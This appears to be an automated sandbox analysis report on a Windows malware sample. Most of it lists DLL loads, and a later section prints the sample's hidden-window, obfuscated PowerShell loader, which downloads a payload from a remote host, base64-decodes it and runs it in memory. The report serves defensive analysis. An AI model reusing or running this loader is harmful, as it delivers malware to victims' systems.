                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1866565286.0000000007981000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 00000004.00000002.1878451425.0000000009FDE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Femetagershuses)$gLoBal:HAVeABLE = [SySteM.texT.EncOdInG]::aSCiI.GeTStrinG($sTegEPAndErNEs)$glOBAl:RAaDIgHedsbELB=$HAVeAbLe.SubsTring($TRAnsCeNdErENDe,$ULtraStRUCTuralLy)<#Styregrupp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Dendroclastic226 $Repetitionsimalar $Backward), (Lumskheden @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Falholdelsen = [AppDomain]::CurrentDomain.GetAs
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Santalaceous)), $Fleuret).DefineDynamicModule($Flugtskuddene, $false).DefineType($Vandforsyningsresursers, $Variablens, [System.Multic
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Femetagershuses)$gLoBal:HAVeABLE = [SySteM.texT.EncOdInG]::aSCiI.GeTStrinG($sTegEPAndErNEs)$glOBAl:RAaDIgHedsbELB=$HAVeAbLe.SubsTring($TRAnsCeNdErENDe,$ULtraStRUCTuralLy)<#Styregrupp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM .
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E 